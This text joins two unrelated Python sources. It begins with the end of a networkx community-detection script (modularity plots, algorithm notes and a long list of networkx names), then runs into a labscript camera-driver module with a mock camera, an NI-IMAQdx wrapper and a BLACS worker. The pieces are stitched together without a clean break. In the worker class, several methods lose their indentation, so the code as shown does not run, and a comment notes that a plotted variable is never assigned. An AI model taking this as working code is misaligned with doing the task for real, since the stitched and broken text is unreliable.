    plt.plot(res, q_bp, 'b')
    plt.plot(res, q_dend[0], 'r')
    plt.plot(res, q_dend[1], 'g')
    plt.plot(res, q_dend[2], 'k')
    plt.xlabel('Resolution')
    plt.ylabel('modularity')
    plt.legend(['best partition', 'dendrogram0', 'dendrogram1a', 'dendrogram1b'])
    plt.show()

# Plot coverage metric
# NOTE(review): `coverage` is never assigned above (its computation is
# commented out), so this plots an all-zeros line -- confirm this plot is
# still wanted.
if True:
    plt.plot(res, coverage, 'b')
    plt.xlabel('Resolution')
    plt.ylabel('Coverage')
    plt.legend(['best partition'])
    plt.show()
#------------------------------------------------------------------------------------------------------------
# Explore networkx's community partitioning
# # # # # # CONSTRUCTING GRAPHS WITH COMMUNITY STRUCTURE TO TEST ALGORITHMS
#
# (1). LFR_benchmark_graph - construct graph for testing community detection algorithms. Define degree distributions,
# community size distributions, strength of edges in graph and in communities.
#
# (2). nx.community.community_generators. - whole library of generators for graphs with community structure
#
#
#
#
# # # # # # CLUSTERING ALGORITHMS
#
# (1). kernighan_lin_bisection - algorithm iteratively swaps pairs of nodes to reduce the edge cut between the two sets.
#
# (2). asyn_fluidc - asynchronous fluid communities algorithm (k = # communities to find)
# Note: have to find Giant Connected Component first.
# part = nx.community.asyn_fluidc(G, k=5, max_iter=100)
#
# (3). girvan_newman - Finds communities in a graph using the Girvan–Newman method.
# from operator import itemgetter
# G = nx.path_graph(10)
# edges = G.edges()
# nx.set_edge_attributes(G, {(u, v): v for u, v in edges}, 'weight')
# def heaviest(G):
# u, v, w = max(G.edges(data='weight'), key=itemgetter(2))
# return (u, v)
#
# comp = girvan_newman(G, most_valuable_edge=heaviest)
# tuple(sorted(c) for c in next(comp))
#
# (4). asyn_lpa_communities - asynchronous label propagation community detection algorithm
# nx.community.asyn_lpa_communities(G, weight=None)
#
# (5). label_propagation_communities - Generates community sets determined by label propagation
# part = nx.community.label_propagation_communities(G)
#
# (6). k_clique_communities - Find k-clique communities in graph using the percolation method.
# union of all cliques of size k that can be reached through adjacent (sharing k-1 nodes) k-cliques.
# nx.community.k_clique_communities(G, k, cliques=None)
#
#
#
#
# # # # # # CLUSTER QUALITY METRICS
#
# (1). coverage - quality measure of a partition: ratio of intra-community edges to the total edges in the graph.
#
# (2). performance - ratio of intra-community edges plus inter-community non-edges with the total number of potential edges.
# perf = nx.community.performance(G, partition)
#
# (3). modularity - Returns the modularity of the given partition of the graph.
# mod = nx.community.modularity(G, communities, weight='weight')
#
# (4). nx.community.quality.intra_community_edges
#
# (5). nx.community.quality.inter_community_edges
#
# (6). nx.community.quality.inter_community_non_edges
# # OTHER NETWORKX STUFF THAT WILL BE USEFUL
# nx.fruchterman_reingold_layout - nice density based graph visualization.
# nx.AmbiguousSolution nx.edge_disjoint_paths nx.multiline_adjlist
# nx.DiGraph nx.edge_expansion nx.mycielski
# nx.ExceededMaxIterations nx.edge_load_centrality nx.mycielski_graph
# nx.Graph nx.edge_subgraph nx.mycielskian
# nx.GraphMLReader nx.edgedfs nx.navigable_small_world_graph
# nx.GraphMLWriter nx.edgelist nx.negative_edge_cycle
# nx.HasACycle nx.edges nx.neighbor_degree
# nx.LCF_graph nx.effective_size nx.neighbors
# nx.MultiDiGraph nx.efficiency nx.network_simplex
# nx.MultiGraph nx.ego nx.networkx
# nx.NetworkXAlgorithmError nx.ego_graph nx.newman_watts_strogatz_graph
# nx.NetworkXError nx.eigenvector nx.node_attribute_xy
# nx.NetworkXException nx.eigenvector_centrality nx.node_boundary
# nx.NetworkXNoCycle nx.eigenvector_centrality_numpy nx.node_clique_number
# nx.NetworkXNoPath nx.empty_graph nx.node_connected_component
# nx.NetworkXNotImplemented nx.enumerate_all_cliques nx.node_connectivity
# nx.NetworkXPointlessConcept nx.erdos_renyi_graph nx.node_degree_xy
# nx.NetworkXTreewidthBoundExceeded nx.estrada_index nx.node_disjoint_paths
# nx.NetworkXUnbounded nx.euler nx.node_expansion
# nx.NetworkXUnfeasible nx.eulerian_circuit nx.node_link
# nx.NodeNotFound nx.exception nx.node_link_data
# nx.NotATree nx.expanders nx.node_link_graph
# nx.OrderedDiGraph nx.expected_degree_graph nx.nodes
# nx.OrderedGraph nx.extended_barabasi_albert_graph nx.nodes_with_selfloops
# nx.OrderedMultiDiGraph nx.extrema_bounding nx.non_edges
# nx.OrderedMultiGraph nx.fast_could_be_isomorphic nx.non_neighbors
# nx.PowerIterationFailedConvergence nx.fast_gnp_random_graph nx.nonisomorphic_trees
# nx.absolute_import nx.faster_could_be_isomorphic nx.normalized_cut_size
# nx.adamic_adar_index nx.fiedler_vector nx.normalized_laplacian_matrix
# nx.add_cycle nx.filters nx.not_implemented_for
# nx.add_path nx.find_cliques nx.null_graph
# nx.add_star nx.find_cliques_recursive nx.number_attracting_components
# nx.adj_matrix nx.find_cores nx.number_connected_components
# nx.adjacency nx.find_cycle nx.number_of_cliques
# nx.adjacency_data nx.find_induced_nodes nx.number_of_edges
# nx.adjacency_graph nx.florentine_families_graph nx.number_of_isolates
# nx.adjacency_matrix nx.flow nx.number_of_nodes
# nx.adjacency_spectrum nx.flow_hierarchy nx.number_of_nonisomorphic_trees
# nx.adjlist nx.flow_matrix nx.number_of_selfloops
# nx.algebraic_connectivity nx.floyd_warshall nx.number_strongly_connected_components
# nx.algebraicconnectivity nx.floyd_warshall_numpy nx.number_weakly_connected_components
# nx.algorithms nx.floyd_warshall_predecessor_and_distance nx.numeric_assortativity_coefficient
# nx.all nx.freeze nx.numeric_mixing_matrix
# nx.all_neighbors nx.from_dict_of_dicts nx.nx
# nx.all_node_cuts nx.from_dict_of_lists nx.nx_agraph
# nx.all_pairs_bellman_ford_path nx.from_edgelist nx.nx_pydot
# nx.all_pairs_bellman_ford_path_length nx.from_graph6_bytes nx.nx_pylab
# nx.all_pairs_dijkstra nx.from_nested_tuple nx.nx_shp
# nx.all_pairs_dijkstra_path nx.from_numpy_array nx.nx_yaml
# nx.all_pairs_dijkstra_path_length nx.from_numpy_matrix nx.octahedral_graph
# nx.all_pairs_lowest_common_ancestor nx.from_pandas_adjacency nx.operators
# nx.all_pairs_node_connectivity nx.from_pandas_edgelist nx.optimal_edit_paths
# nx.all_pairs_shortest_path nx.from_prufer_sequence nx.optimize_edit_paths
# nx.all_pairs_shortest_path_length nx.from_scipy_sparse_matrix nx.optimize_graph_edit_distance
# nx.all_shortest_paths nx.from_sparse6_bytes nx.ordered
# nx.all_simple_paths nx.frucht_graph nx.out_degree_centrality
# nx.ancestors nx.fruchterman_reingold_layout nx.overall_reciprocity
# nx.antichains nx.full_rary_tree nx.pagerank
# nx.approximate_current_flow_betweenness_centrality nx.function nx.pagerank_alg
# nx.articulation_points nx.gaussian_random_partition_graph nx.pagerank_numpy
# nx.assortativity nx.general_random_intersection_graph nx.pagerank_scipy
# nx.astar nx.generalized_degree nx.pairs
# nx.astar_path nx.generate_adjlist nx.pajek
# nx.astar_path_length nx.generate_edgelist nx.pappus_graph
# nx.atlas nx.generate_gexf nx.parse_adjlist
# nx.attr_matrix nx.generate_gml nx.parse_edgelist
# nx.attr_sparse_matrix nx.generate_graphml nx.parse_gml
# nx.attracting nx.generate_multiline_adjlist nx.parse_graphml
# nx.attracting_component_subgraphs nx.generate_pajek nx.parse_leda
# nx.attracting_components nx.generators nx.parse_multiline_adjlist
# nx.attribute_assortativity_coefficient nx.generic nx.parse_pajek
# nx.attribute_mixing_dict nx.geographical_threshold_graph nx.partial_duplication_graph
# nx.attribute_mixing_matrix nx.geometric nx.path_graph
# nx.attrmatrix nx.get_edge_attributes nx.periphery
# nx.authority_matrix nx.get_node_attributes nx.petersen_graph
# nx.average_clustering nx.gexf nx.planted_partition_graph
# nx.average_degree_connectivity nx.global_efficiency nx.power
# nx.average_neighbor_degree nx.global_parameters nx.powerlaw_cluster_graph
# nx.average_node_connectivity nx.global_reaching_centrality nx.predecessor
# nx.average_shortest_path_length nx.gml nx.preferential_attachment
# nx.balanced_tree nx.gn_graph nx.prefix_tree
# nx.barabasi_albert_graph nx.gnc_graph nx.product
# nx.barbell_graph nx.gnm_random_graph nx.project
# nx.beamsearch nx.gnp_random_graph nx.projected_graph
# nx.bellman_ford_path nx.gnr_graph nx.quotient_graph
# nx.bellman_ford_path_length nx.goldberg_radzik nx.ra_index_soundarajan_hopcroft
# nx.bellman_ford_predecessor_and_distance nx.gomory_hu_tree nx.radius
# nx.betweenness nx.google_matrix nx.random_clustered
# nx.betweenness_centrality nx.gpickle nx.random_clustered_graph
# nx.betweenness_centrality_source nx.graph nx.random_degree_sequence_graph
# nx.betweenness_centrality_subset nx.graph6 nx.random_geometric_graph
# nx.betweenness_subset nx.graph_atlas nx.random_graphs
# nx.bfs_beam_edges nx.graph_atlas_g nx.random_k_out_graph
# nx.bfs_edges nx.graph_clique_number nx.random_kernel_graph
# nx.bfs_predecessors nx.graph_edit_distance nx.random_layout
# nx.bfs_successors nx.graph_number_of_cliques nx.random_lobster
# nx.bfs_tree nx.graphical nx.random_partition_graph
# nx.biconnected nx.graphmatrix nx.random_powerlaw_tree
# nx.biconnected_component_edges nx.graphml nx.random_powerlaw_tree_sequence
# nx.biconnected_component_subgraphs nx.graphviews nx.random_regular_graph
# nx.biconnected_components nx.greedy_color nx.random_shell_graph
# nx.bidirectional_dijkstra nx.grid_2d_graph nx.random_tree
# nx.bidirectional_shortest_path nx.grid_graph nx.reaching
# nx.binary nx.harmonic nx.read_adjlist
# nx.binomial_graph nx.harmonic_centrality nx.read_edgelist
# nx.bipartite nx.has_bridges nx.read_gexf
# nx.boundary nx.has_path nx.read_gml
# nx.boundary_expansion nx.havel_hakimi_graph nx.read_gpickle
# nx.breadth_first_search nx.heawood_graph nx.read_graph6
# nx.bridges nx.hexagonal_lattice_graph nx.read_graphml
# nx.bull_graph nx.hierarchy nx.read_leda
# nx.capacity_scaling nx.hits nx.read_multiline_adjlist
# nx.cartesian_product nx.hits_alg nx.read_pajek
# nx.caveman_graph nx.hits_numpy nx.read_shp
# nx.center nx.hits_scipy nx.read_sparse6
# nx.centrality nx.hoffman_singleton_graph nx.read_weighted_edgelist
# nx.chain_decomposition nx.house_graph nx.read_yaml
# nx.chains nx.house_x_graph nx.readwrite
# nx.chordal nx.hub_matrix nx.reciprocity
# nx.chordal_cycle_graph nx.hybrid nx.recursive_simple_cycles
# nx.chordal_graph_cliques nx.hypercube_graph nx.relabel
# nx.chordal_graph_treewidth nx.icosahedral_graph nx.relabel_gexf_graph
# nx.chvatal_graph nx.identified_nodes nx.relabel_nodes
# nx.circulant_graph nx.immediate_dominators nx.relaxed_caveman_graph
# nx.circular_ladder_graph nx.in_degree_centrality nx.release
# nx.circular_layout nx.incidence_matrix nx.reportviews
# nx.classes nx.induced_subgraph nx.rescale_layout
# nx.classic nx.info nx.resource_allocation_index
# nx.clique nx.information_centrality nx.restricted_view
# nx.cliques_containing_node nx.intersection nx.reverse
# nx.closeness nx.intersection_all nx.reverse_view
# nx.closeness_centrality nx.intersection_array nx.rich_club_coefficient
# nx.closeness_vitality nx.inverse_line_graph nx.richclub
# nx.cluster nx.is_aperiodic nx.ring_of_cliques
# nx.clustering nx.is_arborescence nx.rooted_product
# nx.cn_soundarajan_hopcroft nx.is_attracting_component nx.s_metric
# nx.coloring nx.is_biconnected nx.scale_free_graph
# nx.common_neighbors nx.is_bipartite nx.sedgewick_maze_graph
# nx.communicability nx.is_branching nx.selfloop_edges
# nx.communicability_alg nx.is_chordal nx.semiconnected
# nx.communicability_betweenness_centrality nx.is_connected nx.set_edge_attributes
# nx.communicability_exp nx.is_digraphical nx.set_node_attributes
# nx.community nx.is_directed nx.shell_layout
# nx.complement nx.is_directed_acyclic_graph nx.shortest_path
# nx.complete_bipartite_graph nx.is_distance_regular nx.shortest_path_length
# nx.complete_graph nx.is_dominating_set nx.shortest_paths
# nx.complete_multipartite_graph nx.is_edge_cover nx.shortest_simple_paths
# nx.components nx.is_empty nx.similarity
# nx.compose nx.is_eulerian nx.simple_cycles
# nx.compose_all nx.is_forest nx.simple_paths
# nx.condensation nx.is_frozen nx.single_source_bellman_ford
# nx.conductance nx.is_graphical nx.single_source_bellman_ford_path
# nx.configuration_model nx.is_isolate nx.single_source_bellman_ford_path_length
# nx.connected nx.is_isomorphic nx.single_source_dijkstra
# nx.connected_caveman_graph nx.is_k_edge_connected nx.single_source_dijkstra_path
# nx.connected_component_subgraphs nx.is_kl_connected nx.single_source_dijkstra_path_length
# nx.connected_components nx.is_matching nx.single_source_shortest_path
# nx.connected_double_edge_swap nx.is_maximal_matching nx.single_source_shortest_path_length
# nx.connected_watts_strogatz_graph nx.is_multigraphical nx.single_target_shortest_path
# nx.connectivity nx.is_negatively_weighted nx.single_target_shortest_path_length
# nx.constraint nx.is_pseudographical nx.small
# nx.contracted_edge nx.is_semiconnected nx.smetric
# nx.contracted_nodes nx.is_simple_path nx.social
# nx.convert nx.is_strongly_connected nx.soft_random_geometric_graph
# nx.convert_matrix nx.is_strongly_regular nx.sparse6
# nx.convert_node_labels_to_integers nx.is_tree nx.spectral_layout
# nx.core nx.is_valid_degree_sequence_erdos_gallai nx.spectral_ordering
# nx.core_number nx.is_valid_degree_sequence_havel_hakimi nx.spectrum
# nx.coreviews nx.is_valid_joint_degree nx.spring_layout
# nx.correlation nx.is_weakly_connected nx.square_clustering
# nx.cost_of_flow nx.is_weighted nx.star_graph
# nx.could_be_isomorphic nx.isolate nx.stochastic
# nx.covering nx.isolates nx.stochastic_graph
# nx.create_empty_copy nx.isomorphism nx.stoer_wagner
# nx.cubical_graph nx.jaccard_coefficient nx.strong_product
# nx.current_flow_betweenness nx.jit nx.strongly_connected
# nx.current_flow_betweenness_centrality nx.jit_data nx.strongly_connected_component_subgraphs
# nx.current_flow_betweenness_centrality_subset nx.jit_graph nx.strongly_connected_components
# nx.current_flow_betweenness_subset nx.johnson nx.strongly_connected_components_recursive
# nx.current_flow_closeness nx.join nx.structuralholes
# nx.current_flow_closeness_centrality nx.joint_degree_graph nx.subgraph
# nx.cut_size nx.joint_degree_seq nx.subgraph_alg
# nx.cuts nx.json_graph nx.subgraph_centrality
# nx.cycle_basis nx.k_components nx.subgraph_centrality_exp
# nx.cycle_graph nx.k_core nx.swap
# nx.cycles nx.k_corona nx.symmetric_difference
# nx.cytoscape nx.k_crust nx.tensor_product
# nx.cytoscape_data nx.k_edge_augmentation nx.test
# nx.cytoscape_graph nx.k_edge_components nx.tests
# nx.dag nx.k_edge_subgraphs nx.tetrahedral_graph
# nx.dag_longest_path nx.k_nearest_neighbors nx.thresholded_random_geometric_graph
# nx.dag_longest_path_length nx.k_random_intersection_graph nx.to_dict_of_dicts
# nx.dag_to_branching nx.k_shell nx.to_dict_of_lists
# nx.davis_southern_women_graph nx.kamada_kawai_layout nx.to_directed
# nx.degree nx.karate_club_graph nx.to_edgelist
# nx.degree_alg nx.katz nx.to_graph6_bytes
# nx.degree_assortativity_coefficient nx.katz_centrality nx.to_nested_tuple
# nx.degree_centrality nx.katz_centrality_numpy nx.to_networkx_graph
# nx.degree_histogram nx.kl_connected_subgraph nx.to_numpy_array
# nx.degree_mixing_dict nx.kosaraju_strongly_connected_components nx.to_numpy_matrix
# nx.degree_mixing_matrix nx.krackhardt_kite_graph nx.to_numpy_recarray
# nx.degree_pearson_correlation_coefficient nx.ladder_graph nx.to_pandas_adjacency
# nx.degree_seq nx.laplacian_matrix nx.to_pandas_edgelist
# nx.degree_sequence_tree nx.laplacian_spectrum nx.to_prufer_sequence
# nx.dense nx.laplacianmatrix nx.to_scipy_sparse_matrix
# nx.dense_gnm_random_graph nx.lattice nx.to_sparse6_bytes
# nx.density nx.layout nx.to_undirected
# nx.depth_first_search nx.leda nx.topological_sort
# nx.desargues_graph nx.lexicographic_product nx.tournament
# nx.descendants nx.lexicographical_topological_sort nx.transitive_closure
# nx.dfs_edges nx.linalg nx.transitive_reduction
# nx.dfs_labeled_edges nx.line nx.transitivity
# nx.dfs_postorder_nodes nx.line_graph nx.traversal
# nx.dfs_predecessors nx.link_analysis nx.tree
# nx.dfs_preorder_nodes nx.link_prediction nx.tree_all_pairs_lowest_common_ancestor
# nx.dfs_successors nx.load nx.tree_data
# nx.dfs_tree nx.load_centrality nx.tree_graph
# nx.diameter nx.local_bridges nx.trees
# nx.diamond_graph nx.local_constraint nx.triad_graph
# nx.difference nx.local_efficiency nx.triadic_census
# nx.digraph nx.local_reaching_centrality nx.triads
# nx.dijkstra_path nx.lollipop_graph nx.triangles
# nx.dijkstra_path_length nx.lowest_common_ancestor nx.triangular_lattice_graph
# nx.dijkstra_predecessor_and_distance nx.lowest_common_ancestors nx.trivial_graph
# nx.directed nx.make_clique_bipartite nx.truncated_cube_graph
# nx.directed_configuration_model nx.make_max_clique_graph nx.truncated_tetrahedron_graph
# nx.directed_havel_hakimi_graph nx.make_small_graph nx.turan_graph
# nx.directed_laplacian_matrix nx.margulis_gabber_galil_graph nx.tutte_graph
# nx.directed_modularity_matrix nx.matching nx.unary
# nx.disjoint_union nx.max_flow_min_cost nx.uniform_random_intersection_graph
# nx.disjoint_union_all nx.max_weight_matching nx.union
# nx.dispersion nx.maximal_independent_set nx.union_all
# nx.distance_measures nx.maximal_matching nx.unweighted
# | |
#####################################################################
# #
# /labscript_devices/IMAQdxCamera/blacs_workers.py #
# #
# Copyright 2019, Monash University and contributors #
# #
# This file is part of labscript_devices, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
# Original imaqdx_camera server by dt, with modifications by rpanderson and cbillington.
# Refactored as a BLACS worker by cbillington
import sys
from time import perf_counter
from blacs.tab_base_classes import Worker
import threading
import numpy as np
from labscript_utils import dedent
import labscript_utils.h5_lock
import h5py
import labscript_utils.properties
import zmq
from labscript_utils.ls_zprocess import Context
from labscript_utils.shared_drive import path_to_local
from labscript_utils.properties import set_attributes
# Don't import nv yet so as not to throw an error, allow worker to run as a dummy
# device, or for subclasses to import this module to inherit classes without requiring
# nivision
nv = None
def _monkeypatch_imaqdispose():
    """Monkeypatch a fix to a memory leak bug in pynivision. The pynivision project is
    no longer active, so we can't contribute this fix upstream. In the long run,
    hopefully someone (perhaps us) forks it so that bugs can be addressed in the
    normal way"""
    import nivision.core
    import ctypes
    # Keep a reference to the original low-level dispose function, which the
    # replacement delegates to.
    _imaqDispose = nivision.core._imaqDispose
    def imaqDispose(obj):
        # Dispose objects wrapping a ctypes pointer via their _contents field:
        if getattr(obj, "_contents", None) is not None:
            _imaqDispose(ctypes.byref(obj._contents))
            obj._contents = None
        # Dispose objects wrapping a ctypes simple value:
        if getattr(obj, "value", None) is not None:
            _imaqDispose(obj)
            obj.value = None
        # This is the bugfix: pointers as raw ints were not being disposed:
        if isinstance(obj, int):
            _imaqDispose(obj)
    # Install the patched function both in nivision.core and on our module
    # alias `nv` so all callers pick it up.
    nivision.core.imaqDispose = nv.imaqDispose = imaqDispose
class MockCamera(object):
    """Mock camera class that returns fake image data.

    Stands in for a real IMAQdx camera so the worker can run without
    hardware: attributes are stored in a plain dict, and snap() synthesises
    a noisy image watermarked "NOT REAL DATA".
    """
    def __init__(self):
        print("Starting device worker as a mock device")
        self.attributes = {}
    def set_attributes(self, attributes):
        """Update the stored attributes from the given dict."""
        self.attributes.update(attributes)
    def get_attribute(self, name):
        """Return the stored value of the named attribute."""
        return self.attributes[name]
    def get_attribute_names(self, visibility_level=None):
        """Return the names of all stored attributes (visibility ignored)."""
        return list(self.attributes.keys())
    def configure_acquisition(self, continuous=False, bufferCount=5):
        """No-op: the mock needs no acquisition setup."""
        pass
    def grab(self):
        """Return one fake frame (same as snap())."""
        return self.snap()
    def grab_multiple(self, n_images, images, waitForNextBuffer=True):
        """Append n_images fake frames to the given `images` list."""
        print(f"Attempting to grab {n_images} (mock) images.")
        for i in range(n_images):
            images.append(self.grab())
            print(f"Got (mock) image {i+1} of {n_images}.")
        print(f"Got {len(images)} of {n_images} (mock) images.")
    def snap(self):
        """Return a synthetic image: an inverted Gaussian dip plus Poisson
        noise, watermarked with the text "NOT REAL DATA"."""
        N = 500  # image is N x N pixels
        A = 500  # peak intensity of the clean image
        # Bugfix: use N for the coordinate grid instead of a second
        # hard-coded 500, so the reshape below stays consistent if N changes.
        x = np.linspace(-5, 5, N)
        y = x.reshape((N, 1))
        clean_image = A * (1 - 0.5 * np.exp(-(x ** 2 + y ** 2)))
        # Write text on the image that says "NOT REAL DATA"
        from PIL import Image, ImageDraw, ImageFont
        font = ImageFont.load_default()
        canvas = Image.new('L', [N // 5, N // 5], (0,))
        draw = ImageDraw.Draw(canvas)
        draw.text((10, 20), "NOT REAL DATA", font=font, fill=1)
        clean_image += 0.2 * A * np.asarray(canvas.resize((N, N)).rotate(20))
        return np.random.poisson(clean_image)
    def stop_acquisition(self):
        """No-op for the mock camera."""
        pass
    def abort_acquisition(self):
        """No-op for the mock camera."""
        pass
    def close(self):
        """No-op for the mock camera."""
        pass
class IMAQdx_Camera(object):
    """Wrapper around the NI-IMAQdx driver (via pynivision) for one camera.

    nivision is imported lazily on instantiation so this module can be
    imported without NI software installed (e.g. when using MockCamera).
    """
    def __init__(self, serial_number):
        """Find, open and set up the camera with the given serial number.

        Raises if no connected camera matches.
        """
        global nv
        import nivision as nv
        _monkeypatch_imaqdispose()
        # Find the camera:
        print("Finding camera...")
        for cam in nv.IMAQdxEnumerateCameras(True):
            # The 64-bit serial number is split over two 32-bit fields.
            if serial_number == (cam.SerialNumberHi << 32) + cam.SerialNumberLo:
                self.camera = cam
                break
        else:
            msg = f"No connected camera with serial number {serial_number:X} found"
            raise Exception(msg)
        # Connect to the camera:
        print("Connecting to camera...")
        self.imaqdx = nv.IMAQdxOpenCamera(
            self.camera.InterfaceName, nv.IMAQdxCameraControlModeController
        )
        # Keep an img attribute so we don't have to create it every time
        self.img = nv.imaqCreateImage(nv.IMAQ_IMAGE_U16)
        # Flag polled by grab_multiple() so another thread can abort it.
        self._abort_acquisition = False
    def set_attributes(self, attr_dict):
        """Set multiple attributes from a dict of name -> value."""
        for k, v in attr_dict.items():
            self.set_attribute(k, v)
    def set_attribute(self, name, value):
        """Set the value of the attribute of the given name to the given value"""
        _value = value  # Keep the original for the sake of the error message
        if isinstance(_value, str):
            _value = _value.encode('utf8')
        try:
            nv.IMAQdxSetAttribute(self.imaqdx, name.encode('utf8'), _value)
        except Exception as e:
            # Add some info to the exception:
            msg = f"failed to set attribute {name} to {value}"
            raise Exception(msg) from e
    def get_attribute_names(self, visibility_level, writeable_only=True):
        """Return a list of all attribute names of readable attributes, for the given
        visibility level. Optionally return only writeable attributes"""
        visibilities = {
            'simple': nv.IMAQdxAttributeVisibilitySimple,
            'intermediate': nv.IMAQdxAttributeVisibilityIntermediate,
            'advanced': nv.IMAQdxAttributeVisibilityAdvanced,
        }
        visibility_level = visibilities[visibility_level.lower()]
        attributes = []
        for a in nv.IMAQdxEnumerateAttributes2(self.imaqdx, b'', visibility_level):
            if writeable_only and not a.Writable:
                continue
            if not a.Readable:
                continue
            attributes.append(a.Name.decode('utf8'))
        return sorted(attributes)
    def get_attribute(self, name):
        """Return current value of attribute of the given name"""
        try:
            value = nv.IMAQdxGetAttribute(self.imaqdx, name.encode('utf8'))
            # Enum attributes come back as IMAQdxEnumItem objects; report
            # their name rather than the raw enum.
            if isinstance(value, nv.core.IMAQdxEnumItem):
                value = value.Name
            if isinstance(value, bytes):
                value = value.decode('utf8')
            return value
        except Exception as e:
            # Add some info to the exception:
            raise Exception(f"Failed to get attribute {name}") from e
    def snap(self):
        """Acquire a single image and return it"""
        nv.IMAQdxSnap(self.imaqdx, self.img)
        return self._decode_image_data(self.img)
    def configure_acquisition(self, continuous=True, bufferCount=5):
        """Configure and start a (possibly continuous) buffered acquisition."""
        nv.IMAQdxConfigureAcquisition(
            self.imaqdx, continuous=continuous, bufferCount=bufferCount
        )
        nv.IMAQdxStartAcquisition(self.imaqdx)
    def grab(self, waitForNextBuffer=True):
        """Return the next image from an already-configured acquisition."""
        nv.IMAQdxGrab(self.imaqdx, self.img, waitForNextBuffer=waitForNextBuffer)
        return self._decode_image_data(self.img)
    def grab_multiple(self, n_images, images, waitForNextBuffer=True):
        """Append n_images frames to the list `images`, retrying on timeouts.

        Returns early (leaving `images` partially filled) when
        abort_acquisition() has been called from another thread.
        """
        print(f"Attempting to grab {n_images} images.")
        for i in range(n_images):
            while True:
                if self._abort_acquisition:
                    print("Abort during acquisition.")
                    self._abort_acquisition = False
                    return
                try:
                    images.append(self.grab(waitForNextBuffer))
                    print(f"Got image {i+1} of {n_images}.")
                    break
                except nv.ImaqDxError as e:
                    # Timeouts are expected while waiting for triggers; keep
                    # polling. Any other driver error is re-raised.
                    if e.code == nv.IMAQdxErrorTimeout.value:
                        print('.', end='')
                        continue
                    raise
        print(f"Got {len(images)} of {n_images} images.")
    def stop_acquisition(self):
        """Stop and unconfigure the current acquisition."""
        nv.IMAQdxStopAcquisition(self.imaqdx)
        nv.IMAQdxUnconfigureAcquisition(self.imaqdx)
    def abort_acquisition(self):
        """Request that grab_multiple() return early."""
        self._abort_acquisition = True
    def _decode_image_data(self, img):
        """Convert a nivision image into an owned numpy array."""
        img_array = nv.imaqImageToArray(img)
        img_array_shape = (img_array[2], img_array[1])
        # bitdepth in bytes
        bitdepth = len(img_array[0]) // (img_array[1] * img_array[2])
        dtype = {1: np.uint8, 2: np.uint16, 4: np.uint32}[bitdepth]
        data = np.frombuffer(img_array[0], dtype=dtype).reshape(img_array_shape)
        # Copy so the returned array owns its memory independently of the
        # driver's buffer.
        return data.copy()
    def close(self):
        """Close the connection to the camera."""
        nv.IMAQdxCloseCamera(self.imaqdx)
class IMAQdxCameraWorker(Worker):
# Subclasses may override this if their interface class takes only the serial number
# as an instantiation argument, otherwise they may reimplement get_camera():
interface_class = IMAQdx_Camera
    def init(self):
        """Connect to the camera and apply the initial attribute settings.

        Called by BLACS when the worker process starts up.
        """
        self.camera = self.get_camera()
        print("Setting attributes...")
        # smart_cache remembers the last value written for each attribute so
        # unchanged attributes are not re-sent to the camera.
        self.smart_cache = {}
        self.set_attributes_smart(self.camera_attributes)
        self.set_attributes_smart(self.manual_mode_camera_attributes)
        print("Initialisation complete")
        # State used during buffered (shot) acquisitions:
        self.images = None
        self.n_images = None
        self.attributes_to_save = None
        self.exposures = None
        self.acquisition_thread = None
        self.h5_filepath = None
        self.stop_acquisition_timeout = None
        self.exception_on_failed_shot = None
        # State used for continuous (video-style) acquisition:
        self.continuous_stop = threading.Event()
        self.continuous_thread = None
        self.continuous_dt = None
        # REQ socket used to stream acquired frames to the parent process:
        self.image_socket = Context().socket(zmq.REQ)
        self.image_socket.connect(
            f'tcp://{self.parent_host}:{self.image_receiver_port}'
        )
def get_camera(self):
"""Return an instance of the camera interface class. Subclasses may override
this method to pass required arguments to their class if they require more
than just the serial number."""
if self.mock:
return MockCamera()
else:
return self.interface_class(self.serial_number)
def set_attributes_smart(self, attributes):
"""Call self.camera.set_attributes() to set the given attributes, only setting
those that differ from their value in, or are absent from self.smart_cache.
Update self.smart_cache with the newly-set values"""
uncached_attributes = {}
for name, value in attributes.items():
if name not in self.smart_cache or self.smart_cache[name] != value:
uncached_attributes[name] = value
self.smart_cache[name] = value
self.camera.set_attributes(uncached_attributes)
def get_attributes_as_dict(self, visibility_level):
"""Return a dict of the attributes of the camera for the given visibility
level"""
names = self.camera.get_attribute_names(visibility_level)
attributes_dict = {name: self.camera.get_attribute(name) for name in names}
return attributes_dict
def get_attributes_as_text(self, visibility_level):
"""Return a string representation of the attributes of the camera for
the given visibility level"""
attrs = self.get_attributes_as_dict(visibility_level)
# Format it nicely:
lines = [f' {repr(key)}: {repr(value)},' for key, value in attrs.items()]
dict_repr = '\n'.join(['{'] + lines + ['}'])
return self.device_name + '_camera_attributes = ' + dict_repr
def snap(self):
"""Acquire one frame in manual mode. Send it to the parent via
self.image_socket. Wait for a response from the parent."""
image = self.camera.snap()
self._send_image_to_parent(image)
    def _send_image_to_parent(self, image):
        """Send the image to the GUI to display. This will block if the parent process
        is lagging behind in displaying frames, in order to avoid a backlog."""
        # Multipart message: JSON metadata first, then the raw image buffer
        # sent without copying.
        metadata = dict(dtype=str(image.dtype), shape=image.shape)
        self.image_socket.send_json(metadata, zmq.SNDMORE)
        self.image_socket.send(image, copy=False)
        # REQ/REP pattern: wait for the parent's acknowledgement.
        response = self.image_socket.recv()
        assert response == b'ok', response
    def continuous_loop(self, dt):
        """Acquire continuously in a loop, with minimum repetition interval dt"""
        while True:
            if dt is not None:
                # Timestamp before grabbing so the interval covers the whole
                # grab-and-send cycle.
                t = perf_counter()
            image = self.camera.grab()
            self._send_image_to_parent(image)
            if dt is None:
                timeout = 0
            else:
                # Wait only for the remainder of the requested interval.
                timeout = t + dt - perf_counter()
            # Event.wait doubles as both the pacing sleep and the stop
            # signal: it returns True (and we exit) when stop_continuous()
            # sets the event.
            if self.continuous_stop.wait(timeout):
                self.continuous_stop.clear()
                break
def start_continuous(self, dt):
"""Begin continuous acquisition in a thread with minimum repetition interval
dt"""
assert self.continuous_thread is None
self.camera.configure_acquisition()
self.continuous_thread = threading.Thread(
target=self.continuous_loop, args=(dt,), daemon=True
)
self.continuous_thread.start()
self.continuous_dt = dt
    def stop_continuous(self, pause=False):
        """Stop the continuous acquisition thread.

        When `pause` is True, self.continuous_dt is retained so acquisition
        can later be resumed at the same rate.
        """
        assert self.continuous_thread is not None
        self.continuous_stop.set()
        self.continuous_thread.join()
        self.continuous_thread = None
        self.camera.stop_acquisition()
        # If we're just 'pausing', then do not clear self.continuous_dt. That way
        # continuous acquisition can be resumed with the same interval by calling
        # start(self.continuous_dt), without having to get the interval from the parent
